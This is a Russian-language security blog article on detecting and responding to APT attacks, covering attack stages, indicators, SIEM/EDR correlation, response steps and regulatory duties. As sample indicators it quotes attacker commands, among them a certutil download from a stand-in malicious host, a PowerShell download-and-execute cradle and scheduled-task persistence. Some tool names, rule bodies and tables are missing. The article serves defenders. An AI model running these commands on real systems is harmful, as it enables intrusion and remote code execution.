APT и целевые атаки: признаки, этапы, детект и практический план реагирования

Главная цель таргетированных атак — закрепиться внутри сети, оставаться незамеченным и постепенно получать доступ к ценным данным или системам.

Что такое APT и чем они отличаются от массовых атак

В отличие от массовых атак, которые рассылают по миллионам адресов ради случайной прибыли, APT-атаки нацелены на конкретную компанию или отрасль. Они используют комбинацию техник — фишинг, эксплойты, уязвимости цепочки поставок, вредоносные обновления. Каждое действие тщательно продумано: злоумышленники избегают шума, действуют вручную и могут находиться в инфраструктуре месяцами.

Главные отличия APT-атак от массовых кампаний:

Мотивы целевых атак выходят за рамки финансовой выгоды. За APT-группами часто стоят государства или крупные криминальные структуры. Они действуют ради политических или военных целей, промышленного шпионажа, внедрения в критическую инфраструктуру. В коммерческом секторе мотивом может быть конкурентная разведка, кража технологий или подготовка к будущим кампаниям по вымогательству.

APT-атаки опасны тем, что их участники не стремятся к быстрой выгоде. Они играют вдолгую, строят инфраструктуру для наблюдения и готовят плацдарм для будущих операций. Именно поэтому их так трудно обнаружить и остановить.

Жизненный цикл APT: этапы и технические индикаторы

Любая APT-атака развивается поэтапно. Нападающие действуют методично, двигаясь от внешней разведки до вывода данных за периметр. Однако на каждом шаге остаются технические следы — индикаторы компрометации (IOC), которые можно отследить через SIEM, EDR или сетевой мониторинг. Грамотная корреляция этих событий поможет обнаружить целевую атаку до того, как злоумышленники закрепятся в инфраструктуре.

Источники данных — это системы, откуда поступает техническая информация (логи, события, метрики, сетевые записи), на основе которой можно обнаружить признаки атаки.

Основные типы источников данных в контексте APT-атак

Системные журналы (Windows Event Log, Syslog)
Здесь фиксируются входы пользователей, запуск процессов, создание задач, обращения к службам.

Пример:

• Event ID 4624 — успешный вход в систему
• Event ID 4698 — создание задачи планировщика

Эти события помогают увидеть попытки закрепления или перемещения по сети.

Sysmon
Расширенный агент Microsoft пишет в журналы подробные действия процессов, сетевых соединений и изменений файлов. Полезен для поиска неочевидных IOC — например, запуска powershell.exe с кодом Base64 или создания новых служб.

EDR (Endpoint Detection and Response)
Агент на рабочих станциях и серверах отслеживает поведение процессов, создание сетевых соединений, изменения в системе. Его данные нужны, чтобы выявлять подозрительные сценарии (living off the land, запуск бекдоров, сбор данных). Подробнее о EDR-системах читайте в нашем блоге.

SIEM (Security Information and Event Management)
Централизованная платформа, куда собираются все события из разных источников.
SIEM не генерирует логи сам — он агрегирует их, анализирует и связывает по корреляционным правилам. Именно здесь срабатывают тревоги, когда несколько разрозненных событий складываются в картину атаки. Как работает SIEM — читайте нашу статью.

Proxy и Firewall фиксируют сетевую активность: кто куда обращался, какие запросы уходили наружу, какие IP заблокированы. С их помощью часто выявляют фазы разведки и эксфильтрации. Что делает брандмауэр и почему без него нельзя строить защиту периметра — читайте в блоге.

DNS и NetFlow / NTA
DNS-логи показывают обращения к подозрительным доменам (например, C2-серверам).
NetFlow и NTA дают возможность отследить всплески исходящего трафика или скрытые туннели.

TI (Threat Intelligence)
Внешние источники с актуальными IOC: IP-адреса, хэши файлов, домены APT-группировок. Коррелируйте их с локальными логами, чтобы понять, контактировала ли сеть с известными вредоносными ресурсами. Узнайте подробнее о Threat Intelligence из нашего блога.

💡 Пример

Если злоумышленник запустил PowerShell с вредоносным скриптом:

• Sysmon зафиксирует запуск процесса
• EDR распознает подозрительное поведение
• SIEM объединит эти события и покажет корреляцию с фишинговым письмом, прошедшим через почтовый шлюз
• Proxy зарегистрирует обращение к внешнему серверу

Вместе эти источники дают полную цепочку атаки от точки входа до эксфильтрации данных.

Первый этап целевой атаки — разведка (Reconnaissance)

На первом этапе атакующие собирают максимум информации о цели: доменные имена, адреса почты сотрудников, публичные IP, используемые технологии. Они анализируют DNS-записи, социальные сети, утечки и даже метаданные из открытых документов.
Цель — понять, как устроена инфраструктура, как легче в нее проникнуть.

IOC и артефакты:

• Частые запросы к поддоменам и API-эндпоинтам организации.
• Повторяющиеся обращения из одной автономной системы к внешним сервисам компании.
• OSINT-активность, например массовый сбор профилей сотрудников в LinkedIn.

Источники данных: DNS-логи, NetFlow, прокси, Threat Intelligence.

Второй этап — проникновение (Initial Access)

После сбора информации злоумышленники переходят к атаке. Самые частые сценарии — фишинг с вредоносными вложениями, эксплуатация уязвимостей в публичных сервисах, атака через цепочку поставок (supply chain).

IOC:

• Вложения формата .LNK, .XLSM, .HTA с макросами.
• Запуск exe -ExecutionPolicy Bypass.
• Создание временных исполняемых файлов в %AppData% или %Temp%.
• Подозрительные внешние POST-запросы к недавно зарегистрированным доменам.

Источники: почтовые шлюзы, Proxy, EDR, Sysmon (события 1, 3, 11).

Третий этап — закрепление (Persistence)

После первичного доступа злоумышленники создают точки повторного входа. Они внедряют бэкдоры, добавляют задачи в планировщик, используют WMI-события или изменяют ветки автозагрузки в реестре.

Типовые логи и команды:

• schtasks /create /tn Update /tr C:\ProgramData\update.ps1 /sc minute
• wmic process call create «powershell -EncodedCommand …»
• Изменениявключах HKCU\Software\Microsoft\Windows\CurrentVersion\Run

IOC:

• Неизвестные службы и процессы в автозапуске.
• Запуск PowerShell без цифровой подписи.
• Новые планировщики с подозрительными путями.

Источники: Sysmon (13, 19), Windows Event Log, EDR, WMI Tracing.

Четвертый этап — продвижение по сети (Lateral Movement)

Когда злоумышленники закрепились, они начинают двигаться внутри сети. Для этого применяют стандартные средства администрирования — RDP, SMB, WMI, PSExec. Часто используются украденные учётные данные.

IOC:

• Внезапные подключения по RDP между сегментами, где это не используется.
• Массовые SMB-запросы с одного хоста.
• Команды psexec \\host cmd /c whoami.
• Аномальные события входа 4624 (с разных рабочих станций за короткое время).

Источники: журналы Windows Security, Sysmon (3, 10), сетевой NTA, SIEM-корреляции.

Пятый этап — сбор и эксфильтрация данных (Collection & Exfiltration)

Финальный этап целевой атаки — упаковка и выведение информации за пределы сети.
Данные архивируются и отправляются через HTTPS, FTP, DNS-туннели или облачные сервисы.

IOC:

• Запуск exe или 7z.exe с ключами -hp и -r.
• Использование curl, powershell Invoke-WebRequest, exe для передачи данных.
• Аномальный исходящий трафик на внешние IP с большими объёмами.
• Постоянные DNS-запросы к поддоменам с рандомизированными именами.

Источники: Proxy, DLP, Firewall, NetFlow, SIEM, NTA.

📊 Таблица технических индикаторов

APT-атаки всегда оставляют следы, но заметить их можно только при постоянном мониторинге и корреляции данных из разных источников. Если SIEM не видит этих событий в связке, злоумышленники спокойно будут действовать внутри сети месяцами, а организация узнает об атаке уже после утечки.

Инфраструктура угрозы: ключевые TTP и техники

TTP (Tactics, Techniques and Procedures) — способ описать, как действует злоумышленник на всех этапах атаки. Термин используется в аналитике угроз (Threat Intelligence, MITRE ATT&CK, SOC) и помогает говорить о поведении атакующих единым техническим языком.

APT-группы строят атаки из набора простых приёмов, комбинируют их и маскируют под легитимные операции. Поэтому база защиты — это понимание, какие техники применяют злоумышленники и какие поведенческие паттерны они оставляют. Разберем основные TTP с примерами IOC и подсказками для детекции.

Living off the Land  (LoL) — что это и как менять подход к детекции

Злоумышленник не всегда приносит на сервер свой вредоносный файл. Living off the Land (LoL) — это стратегия APT-групп, при которой они находятся внутри сети, используя легитимные системные инструменты для вредоносных действий. Она опасна тем, что не оставляет очевидных следов и выглядит как обычная работа администратора.

Злоумышленник запускает уже установленные в Windows или Linux инструменты (powershell, wmic, rundll32, certutil) и с их помощью выполняет вредоносные сценарии. По хэшу файла его не поймаешь, потому что запускается исполняемый файл или утилита, которая входит в состав ОС или законного ПО.

Что искать

В командной строке процесса встречается -EncodedCommand или -e у PowerShell — это признак запуска закодированного скрипта. Пример строки в логе Sysmon (EventID 1):

ProcessCreate: ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=-NoProfile -EncodedCommand JABXAG…

• Обратите внимание на длинную Base64-строку и отсутствие пользовательской интерактивности.
• Использование exe -decode для получения бинарных данных с внешнего сервера. Пример в прокси-логах: POST → http://malicious.example/payload, затем запуск certutil -urlcache -f http://malicious.example/payload payload.bin.
• exe вызывается с аргументом, указывающим на нестандартную DLL в AppData — в EDR появляется строка запуска с неизвестным путём.
• Команды wmic process call create или schtasks /create с указанием скрипта в %AppData% — ищите создание задач с непривычными интервалами или путями.

Как настроить оповещения (примеры правил):

• SIEM: если ProcessCreate с Image = exe и в CommandLine есть -EncodedCommand → поднять Priority = High.
• EDR: если exe скачивает исполняемый файл из внешнего домена, создать блокировку и тикет на расследование.

При LoL фокус смещается с фиксирования бинарных хэшей на анализ аргументов командной строки, путей запуска и последовательности действий процессов. Это даёт шанс заметить целевую атаку по поведению, а не по подозрительному файлу.

Фишинг и «подмена» почты

Первичный доступ часто получают через письмо: поддельный адрес, вложение с макросом или LNK-файл. Главная ошибка — смотреть только на содержание письма. Нужно связывать событие открытия письма с последующей активностью на хосте.

О фишинге, его признаках и способах защиты читайте в нашем обзоре.

Атаки с подменой адреса часто используют гомоглифы — символы, внешне похожие на латинские/кириллические буквы, либо небольшие опечатки. На первый взгляд домен выглядит как company.ru, но фактически это другой домен:

• Пример с гомоглифом (латиница vs кириллица):
  boss@company.ru (правильный)
  boss@companу.ru — здесь последняя буква у заменена на кириллическую у (U+0443) или наоборот — визуально совпадает, но домен другой.
• Пример с typosquatting (опечатка одной буквы):
  boss@company.ru
  boss@compa ny.ru (пробел в отображении или лишняя буква)
  boss@c0mpany.ru (цифра 0 вместо буквы o).

Такие подмены обманывают пользователя и автоматические проверки, если система не проверяет envelope-from (MAIL FROM) и домен в заголовке From: отдельно.

Пример реального упрощённого заголовка (подмена справа):

Если Mail client показывает только From:, пользователь видит привычный адрес, а фактически письмо пришло с другого домена.

Что фиксировать:

• Почтовый хедер: From: выглядит как boss@company.ru, а реальный MAIL-FROM — boss@companу.ru (замена буквы). Автоматически ищите похожие домены (typosquatting).

После открытия вложения: в Windows Event Log или Sysmon появится запуск winword.exe → wscript.exe или powershell.exe с загрузкой внешнего кода. Пример цепочки:

MailReceived (proxy) -> UserDoubleClick docm -> ProcessCreate: winword.exe -> ProcessCreate: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command «IEX (New-Object Net.WebClient).DownloadString(‘http://…’)»

• BEC-сценарии: в логах почты видны запросы на перевод средств от имени руководителей, одновременно в CRM фиксируются изменения контактных данных. BEC (Business Email Compromise) — это компрометация деловой переписки, один из самых распространенных и прибыльных видов целевых атак на компании.

Как реагировать:

• SIEM-корреляция: входящая почта с доменом-копией и запуск PowerShell на том же пользователе = инцидент.
• Настроить приемы анализа ссылок: распаковывать URL и сравнивать с белым списком доменов.

Связывайте почтовые события с телеметрией хоста — только так фишинг превратится в обнаруживаемую цепочку.

Эксплойты — что смотреть на веб-публичных сервисах

Целевая уязвимость превращает публичный сервис в точку входа атаки. Признак эксплуатации — аномалия в веб-логах, затем появление незнакомых процессов на сервере.

Как организовать управление уязвимостями в инфраструктуре — подробный обзор.

Что фиксировать:

WAF/NGFW: серия POST-запросов с длинными заголовками или параметрами, приводящими к ошибкам приложения (500, 502), особенно если сразу после этого в системных логах регистрируется запуск нового процесса.

Пример:
AccessLog: POST /document/upload 200 «User-Agent: curl/7.58.0» BodySize=12345

ErrorLog: NullReferenceException at UploadHandler

Syslog: ProcessCreate: Image=C:\Windows\Temp\native.exe

• Паттерн: ошибка в приложении → через несколько секунд появляется исполняемый файл в Temp → дальнейшие сетевые соединения на внешние IP.

Как отслеживать:

• Подписать CVE-фиды в TI и установить правило: если запросы к уязвимому эндпоинту совпадают с появлением новых процессов на хосте — это инцидент.
• WAF: применить virtual patch для подозрительных payload-шаблонов до фактического патча — временное правило в WAF или IDS, которое блокирует попытки эксплуатации конкретной уязвимости до выхода настоящего патча от производителя.

Если связать веб-логи с логами серверов, попытки эксплойта обнаруживаются заметно быстрее.

C2-каналы: что считать аномалией в трафике

C2-канал (Command-and-Control) — это канал связи между скомпрометированным узлом внутри сети и сервером управления, по которому атакующие передают команды и получают данные.

Коммуникация с командным сервером часто маскируется под обычный HTTPS или DNS-трафик. Обнаружение строится не на содержимом трафика — оно зашифровано — а на его поведении.

Признаки:

• Частые короткие HTTPS-запросы к одному домену, где путь URL выглядит случайно: /api/hd3f4g5.
• DNS-запросы с длинными случайными субдоменами, например example.com, с регулярной периодичностью.
• Необычные User-Agent или SNI, либо использование общих облачных сервисов, но с малоизвестными поддоменами.

Где смотреть: NetFlow/Proxy/DNS-логи и Sysmon EventID 3 (Network Connection) — фиксируйте процесс-источник связи.

Пример правила:

• Если ProcessName установил TCP-сессию на внешний IP и за последнюю минуту отправил >10 коротких POST → пометить как подозрительный C2-трафик.

Сетевые аномалии по частоте, длине и регулярности лучшие индикаторы C2.

Evasion-техники: обфускация и безфайловые атаки

APT-операторы используют шифрование, полиморфные загрузчики, скриптовые загрузки в память и живут «без файлов» — код выполняет процессы без записи на диск.

«Безфайловые» целевые атаки не оставляют исполняемых файлов на диске. Они выполняют код в памяти, используют инъекции в легитимные процессы и шифруют полезную нагрузку.

Признаки и детекция:

• Частые инъекции кода в процессы (CreateRemoteThread, NtAllocateVirtualMemory) — видны в Sysmon/EDR.
• PowerShell, выполняющий команды через -EncodedCommand или Invoke-Expression с загруженными строками.
• Неожиданные DllLoad в легитимных процессах.
• Отсутствие записей на диске при интенсивной активности процесса.

Где смотреть: EDR для контроля инъекций и API-вызовов, Sysmon (event 8/10/11), мониторинг памяти, SIEM-корреляции на отсутствие дисковых артефактов при высокой сетевой активности.

Для борьбы нужен EDR с детекцией поведения в памяти и мониторинг API-вызовов.

Рекомендации по защите и детекции

1. Фокусируйте детекцию на поведении процессов и аргументах командной строки, а не только на хэшах файлов.
2. Связывайте события почтового шлюза с EDR-телеметрией: фишинг → запуск PowerShell → сетевые подключения.
3. Мониторьте DNS и NetFlow на аномалии: частота, длина субдоменов, неизвестные IP.
4. Внедряйте EDR с проверкой активности в памяти и Sysmon с расширенными правилами.

Эти меры сокращают окно обнаружения APT, превращают хаотичные индикаторы в воспроизводимую цепочку доказательств.

Детекция таргетированных атак: правила, корреляции и инструментарий

Против APT-атак не работают простые сигнатуры антивирусов. Они ловят известные файлы, но не поведение. Целевая атака требует комплексного подхода: анализ логов, корреляции событий и поведенческие правила в SIEM и EDR.

Источники данных

Для анализа активности и построения цепочки событий нужны логи с разных уровней инфраструктуры:

• Sysmon — детализация действий процессов: кто, что и с какими параметрами запустил.
• Windows Event Logs — авторизация, создание задач, системные ошибки.
• Proxy — обращения к внешним адресам, загрузки файлов, HTTP-запросы.
• Firewall — попытки соединений, новые порты, блокировки.
• DNS — частота и тип запросов, обращения к необычным доменам.

Эти источники дают материал для анализа поведения злоумышленника. Когда SIEM связывает данные из нескольких логов, она показывает не факт события, а картину атаки во времени.

Примеры рабочих правил

Sigma (пример корреляции PowerShell)

Срабатывает, когда PowerShell выполняет закодированные команды — типичный приём APT для безфайлового исполнения кода:

YARA (поиск сетевого Beacon/Metasploit-паттернов)

Выявляет повторяющиеся сетевые шаблоны Beacon-коммуникаций — важно для анализа C2-трафика:

EDR-правило (поведенческое)

Запуск административных команд вне рабочих часов — частый признак разведки внутри сети:

Пример кейса в SIEM

Сценарий:
Пользователь получает фишинговое письмо с вложением, открывает документ, а на хосте запускается PowerShell с параметром -EncodedCommand. Через минуту появляются исходящие DNS-запросы с длинными случайными субдоменами.

Корреляция:

1. Почтовый шлюз → получено письмо с подозрительным доменом.
2. Sysmon → запуск PowerShell без подписи.
3. DNS-логи → аномальные обращения.

Действие: SIEM связывает три события и создаёт алерт уровня High: «Возможная APT-активность через фишинг и DNS-туннель».

Матрица приоритизации алертов

Матрица помогает отделить фоновую активность от критичных событий:

• Алерты уровня High требуют немедленной реакции
• Medium — анализа и подтверждения
• Low — накопления статистики и формирования поведенческой модели.

APT-детекция строится на связи между событиями: запуск PowerShell → сетевые запросы → новые процессы → эксфильтрация. Когда SIEM и EDR собирают эти точки в единую картину, атака перестаёт быть невидимой.

Реагирование на целевую атаку

Первый день после обнаружения APT-атаки решает, насколько серьёзными будут последствия. Если действовать быстро и слаженно, ущерб можно минимизировать: изолировать заражённые узлы, зафиксировать доказательства, восстановить контроль над сетью. Мы дадим пошаговый playbook реагирования с чётким распределением ролей и задач.

Реагирование на инциденты: пошаговый план действий для ИБ-команды в нашем блоге.

Первые 24 часа: стабилизировать и зафиксировать

1. Изолировать подозрительные хосты

• Отключить сеть или VLAN для заражённых систем.
• Не выключать питание — иначе потеряются оперативные данные (RAM).
• При необходимости использовать агент EDR для удалённой изоляции.

2. Собрать volatile-данные (временные артефакты).

• Снимки оперативной памяти (RAM dump).
• Состояние сетевых соединений (netstat -ano, Get-NetTCPConnection).
• Запущенныепроцессы (tasklist, pslist, wmic process).
• Активныеслужбыиавтозапуск (msc, reg query HKCU\Run).
• Времяпоследнеговходапользователей (wevtutil qe Security /q:*[System[(EventID=4624)]] /c:10).

3. Зафиксировать время и условия инцидента.

• Определить точку обнаружения (кто и где заметил активность).
• Записать точное время, источник алерта, хостнейм, IP, пользователя.
• Сохранить исходные логи до ротации.

4. Уведомить ответственных.

• Уведомить SOC и службу ИБ.
• Сообщить SRE / DevOps о необходимости временной изоляции сервисов.
• При подтверждённой компрометации — известить CISO, юристов и PR-команду.

24–72 часа: анализ и коммуникация

1. Проанализировать собранные артефакты:

• Проверить дампы памяти на наличие внедрённых процессов.
• Идентифицировать IOC: имена файлов, IP, домены, хэши.
• Сопоставитьс TI-источниками (Threat Intelligence, MITRE ATT&CK).

2. Проверить lateral movement:

• По логам определить, были ли попытки перемещения между сегментами сети.
• Проанализировать RDP, SMB, WMI, PSExec.
• Проверитьжурналы Windows Security (EventID 4624, 4672, 4688).

3. Пересмотреть учётные записи:

• Сбросить пароли пользователей с признаками компрометации.
• Проверить токены и API-ключи.
• Временно ограничить привилегии администраторов.

4. Организовать коммуникацию:

• PR-служба: готовит нейтральное сообщение для СМИ и партнёров.
• Юристы: определяют, нужно ли официальное уведомление регуляторов (ФСТЭК, Роскомнадзор, Банк России и др.).
• Руководство: утверждает внутренние и внешние коммуникации, чтобы избежать утечек информации.

Роли и задачи в реагировании

Чек-лист сбора volatile-данных

• Dump оперативной памяти
• Логи процессов и сетевых соединений
• Снимки таблиц маршрутизации
• Состояние автозапуска и служб
• Активные пользователи и сессии
• Точное время событий и корреляция с SIEM

Что делать после стабилизации

• Провести root-cause анализ — определить исходную точку проникновения.
• Сопоставить действия с TTP из MITRE ATT&CK.
• Сформировать отчёт и обновить план реагирования.
• Провести повторный пентест или Red Team для проверки устранения уязвимостей.

Известные APT-группы и примеры атак

Вот краткий обзор реальных APT-кампаний, их методов и последствий с фокусом на том, какие техники использовали атакующие и какие риски это создало для организаций.

APT28 (Fancy Bear) — политически мотивированная разведка

Цель. Политические структуры, государственные и медийные организации.
Методы. Целенаправленный spear-phishing, поддельные вложения и ссылки, эксплуатация уязвимостей в почтовых клиентах и браузерах, использование легитимных сервисов для C2.
Последствия. Утечки служебной переписки, компрометация почтовых ящиков руководителей, длительный доступ в инфраструктуру.

При расследовании ищите цепочки: входящее письмо → запуск макроса/PowerShell → исходящие соединения на подозрительные домены.

Lazarus Group — финансовые и supply-chain операции

Цель. Финансовые организации, поставщики ПО, инфраструктурные сервисы.
Методы. Фишинг и целевые эксплойты, внедрение в цепочки поставок, кастомные бэкдоры, использование криптовалютных шлюзов для эксфильтрации.
Последствия. Кражи денег, саботаж платежных процессов, длительная компрометация поставщиков.

Контролируйте целостность билдов, проверяйте цепочки поставок и подписывайте артефакты.

Turla, Gamaredon, Sandworm — региональные и инфраструктурные операции

Цель. Государственные учреждения, телеком-операторы, промышленные объекты в СНГ.
Методы. Комбинация фишинга, web-эксплойтов, использование инструментов удалённого администрирования, DNS-каналов для C2. Sandworm известна разрушительными кампаниями с подбором уязвимостей в критичных системах.
Последствия. Нарушение работы сервисов, утечки данных, длительное присутствие в системе.

Для защиты критичных сервисов вводите многослойный контроль доступа и сегментацию сетей.

Российские кейсы — адаптация общих приёмов к локальной среде

Типовые сценарии в РФ:

• Фишинг под видом 1С. Сообщения и вложения имитируют документы и обновления для 1С: открытие файла запускает скрипт, дающий начальный доступ.
• Поддельные порталы госуслуг. Атакующие развёртывают сайты-клоны, собирают учётные данные или подсовывают формы для загрузки вредоносного ПО.
• Комбинированные кампании. Фишинг + атаки на поставщиков услуг бухгалтерии/электронного документооборота.

Последствия для бизнеса: компрометация бухгалтерии, финансовые потери, срыв отчётности, репутационные риски и необходимость уведомлений регуляторов (для КИИ — дополнительные требования).

В локальном контексте проверяйте подлинность обновлений 1С, внедрите двухфакторную авторизацию для личных кабинетов и контролируйте регистрацию доменов, имитирующих госпорталы.

Таблица: группа → цель → метод → последствия

Рекомендации для российских организаций

1. Связывайте почтовую телеметрию с EDR/Sysmon. Типовой путь компрометации в РФ начинается с фишинга под 1С или госуслуги.
2. Контролируйте цепочки поставок. Проверяйте цифровые подписи и целостность обновлений.
3. Сегментируйте критичные сервисы. Даже при компрометации рабочего места злоумышленник не должен получить свободный доступ к бухгалтерии или ЦОД.
4. Готовьте коммуникацию и юридические сценарии заранее. Для КИИ и регламентированных отраслей потребуется уведомление регулятора и сохранение доказательной базы.

Защита от APT: технический hardening и Zero Trust

Главная защита от APT — не один чудо-брандмауэр, а устойчивая архитектура, где каждая система проверяет и ограничивает другую. Цель — снизить последствия взлома до минимума.

Покажем инженерные меры, которые реально работают в российских ИТ-средах, и инструменты, на которых строится Zero Trust-модель.

Сегментация сети и многофакторная аутентификация (MFA)

При компрометации одного узла злоумышленник не должен пройти дальше:

• Разделите сеть на зоны: пользователи, серверы, АСУ, DMZ.
• Введите MFA для доступа в админ-зоны, VPN и критичные приложения.
• Используйте jump-серверы с аудитом всех сессий.

Даже если атакующий получил учётку, переместиться по сети без второго фактора он не сможет.

Ограничение макросов и PowerShell

Большинство APT-атак начинается с макроса или PowerShell-скрипта:

• Отключите макросы по умолчанию, разрешайте только подписанные.
• Настройте PowerShell врежимеConstrained Language Mode.
• Отслеживайтеаргументы -EncodedCommand, -ExecutionPolicy Bypass в

Устраняется один из главных способов запуска вредоносного кода внутри сети.

Контроль целостности (HIDS и File Integrity Monitoring)

Позволяет выявить несанкционированные изменения конфигураций, системных файлов и журналов:

• Внедрите HIDS (например, OSSEC, Wazuh, AIDE) на критичных серверах.
• Отслеживайте изменения системных DLL, конфигов, ключей реестра.
• Связывайте события изменения с EDR и SIEM для автоматической корреляции.

Быстрое обнаружение следов закрепления и модификации системных файлов.

VPN с ГОСТ-профилем и проверенной криптографией

Защита трафика между филиалами и мобильными сотрудниками, соответствующая требованиям ФСТЭК

• Используйте сертифицированные VPN-решения с ГОСТ-алгоритмами.
• Обновляйте сертификаты и контролируйте доступ через централизованный шлюз.
• Применяйте журналирование VPN-сессий.

Исключается перехват данных и подмена трафика, а также обеспечивается соответствие нормативам №152-ФЗ и №187-ФЗ.

WAF + EDR + NTA

Комбинация защиты веб-уровня, конечных точек и сетевого анализа создаёт сплошную видимость целевой атаки:

• WAF — блокирует эксплуатацию уязвимостей в веб-приложениях.
• EDR — фиксирует поведение процессов и запускает расследование.
• NTA (Network Traffic Analysis) — отслеживает C2-каналы и туннели.

Атака становится видимой на любом уровне — приложений, хостов или сети.

Технические меры защиты от APT

Модель Zero Trust подразумевает:

• Не доверяй никому по умолчанию — каждый пользователь и процесс проходит проверку.
• Минимальные привилегии — только то, что действительно нужно для работы.
• Постоянная верификация — повторная аутентификация и контроль поведения.
• Сегментированный доступ — даже внутри доверенной сети каждый сервис ограничен своей зоной.

Zero Trust превращает инфраструктуру в систему, где ошибка одного звена не ведёт к катастрофе, а любая аномалия быстро фиксируется.

Zero Trust и как правильно его внедрить.

Hardening — это не настройка одной системы, а постоянная инженерная дисциплина.
Zero Trust делает APT-атаки невыгодными: чтобы дойти до цели, злоумышленнику приходится ломать каждое звено защиты по отдельности.

Защита от ATP-атак в рамках №187-ФЗ и требований ФСТЭК

APT-атаки часто нацелены на критическую инфраструктуру — энергетику, транспорт, телеком, финансы, промышленность. Для таких систем вопросы реагирования и уведомления регламентированы законом. Организации необходимо действовать по установленной процедуре.

Обязанность субъектов КИИ анализировать угрозы

Федеральный закон № 187-ФЗ «О безопасности критической информационной инфраструктуры РФ» обязывает владельцев значимых объектов КИИ:

• выявлять и классифицировать объекты,
• анализировать угрозы и уязвимости,
• принимать меры защиты, соразмерные категории значимости,
• реагировать на инциденты ИБ и сообщать о них в уполномоченные органы.

APT-атака для субъекта КИИ — это инцидент, требующий юридического оформления и уведомления.

Требования приказов ФСТЭК № 239 и № 31

Приказ ФСТЭК № 239 определяет порядок реагирования на компьютерные инциденты в КИИ. Он требует:

• фиксировать и документировать все события, связанные с инцидентом
• сохранять журналы и артефакты для анализа
• уведомлять ФСТЭК и ГосСОПКА в установленные сроки
• обеспечивать расследование и отчётность

Приказ ФСТЭК № 31 описывает требования к системам защиты информации и порядок оценки соответствия. Задает базовые критерии: контроль доступа, антивирусная защита, межсетевые экраны, криптозащита и мониторинг событий безопасности.

Эти документы образуют нормативную основу для практического реагирования на APT-атаки в инфраструктуре, признанной значимой.

ГОСТ 57580 и СТО БР ИББС: банковский и финансовый сектор

В финансовых организациях реагирование на инциденты дополнительно регулируется:

• ГОСТ 57580-2 — описывает процесс управления инцидентами, сбор и хранение доказательств, взаимодействие с CERT.
• СТО БР ИББС-1.0-2020 — устанавливает требования к созданию центров мониторинга (SOC) и процедурам уведомлений.

APT-атаки рассматриваются как часть сценариев высокого риска. SOC-подразделение обязано обеспечивать постоянный мониторинг и отчётность перед службой ИБ и регуляторами.

Регламент уведомлений: кому и когда сообщать

ФСТЭК России — если инцидент произошёл на значимом объекте КИИ:

• Срок уведомления — не позднее 24 часов после выявления признаков инцидента.
• Форма и порядок подачи — по каналу ГосСОПКА (или иным утвержденным способом).

ФСБ России (ГосСОПКА) — при выявлении атак на инфраструктуру федерального уровня или в случае утечки защищаемых сведений.

Банк России / Роскомнадзор — для организаций, работающих с ПДн или финансовыми данными.

В течение последующих 72 часов необходимо представить подробный отчет о проведенном внутреннем расследовании инцидента.

Внутренние уведомления:

• Руководство, CISO, ИБ-служба, PR и юристы должны быть оповещены сразу.
• Все действия фиксируются в журнале реагирования (IR-журнал).

APT-риски напрямую связаны с выполнением этих требований. Игнорирование инцидента или несвоевременное уведомление — не только угроза безопасности, но и административная ответственность для субъекта КИИ.

Главное

APT-атаки — это не «вирусы», а длительные целевые кампании.
Ваша компания не случайно попала под атаку.  APT-группа заранее изучила инфраструктуру и людей, вошла точечно и притаилась. Цель — не поломать, а закрепиться, украсть доступы и данные.

Каждый этап атаки оставляет следы — по ним можно ловить злоумышленников.
Разведка, первичный доступ, закрепление, перемещение по сети, эксфильтрация.
На каждом шаге остаются индикаторы компрометации: команды PowerShell, новые задачи планировщика, аномальный исходящий трафик, подозрительные DNS-запросы. Это база для детекции.

Детект надо строить на поведении и сигнатурах.
Современные apt-атаки маскируются под «нормальные» процессы Windows (PowerShell, wmic, certutil). Антивирус это не увидит. Следите за поведением: аргументы командной строки, нетипичные подключения, запуск админ-инструментов в нерабочее время.

Ключ к обнаружению — корреляция логов.
По отдельности события выглядят как «шум». В связке они становятся целевой атакой:
фишинговое письмо → запуск макроса → PowerShell с -EncodedCommand → DNS-туннель → вывод данных.
SIEM и EDR должны формировать целостную картину инцидента, а не выдавать разрозненные оповещения.

Подготовьте план реагирования на первые 24/72 часа.
Изоляция хостов, съём оперативных данных, фиксация времени инцидента, уведомление ответственных, анализ lateral movement, пересмотр учёток, юридическая и PR-коммуникация. Отсутствие заранее подготовленного плейбука приведет к потере времени и утрате доказательств.

Защита — это дисциплина.
Сегментация сети, MFA, ограничение макросов и PowerShell, контроль целостности, сертифицированный VPN, WAF + EDR + NTA, модель Zero Trust.
Цель защиты — не исключить взлом полностью, а минимизировать его последствия для бизнеса и инфраструктуры.

APT — риск не только технический, но и юридический.
Для субъектов КИИ инцидент — это предмет регулирования №187-ФЗ и приказов ФСТЭК.
После устранения инцидента нужно все задокументировать, сохранить артефакты, уведомить регуляторов в срок. Иначе будут не только потери, но и ответственность.

APT-атаки всё чаще адаптируются под российскую инфраструктуру.
Фишинг под видом 1С, поддельные порталы госуслуг, атаки на цепочку поставок, попытки доступа к бухгалтерским системам и объектам КИИ — не единичные случаи, а устойчивая практика. Если вы думаете, что вы неинтересны — проверьте свои логи.

Zero Trust — способ усложнить атаку.
Минимальные привилегии, постоянная проверка, сегментированный доступ. Чем дороже злоумышленнику двигаться по сети, тем меньше шансов, что он останется внутри надолго.

Без сформированных процедур детектирования и реагирования организация беззащитна. Если отсутствуют корректно настроенные правила в SIEM, мониторинг активности PowerShell, DNS и lateral movement и проверенный сценарий действий в первые 24 часа после инцидента, то вопрос не «произойдёт ли атака», а «насколько серьёзными окажутся её последствия».

APT — не случайная авария, а целенаправленный и управляемый процесс. Побеждает не тот, кого никогда не атаковали, а тот, кто смог вовремя обнаружить вторжение, зафиксировать его технически и юридически, изолировать угрозу и корректно сообщить о ней по установленным правилам.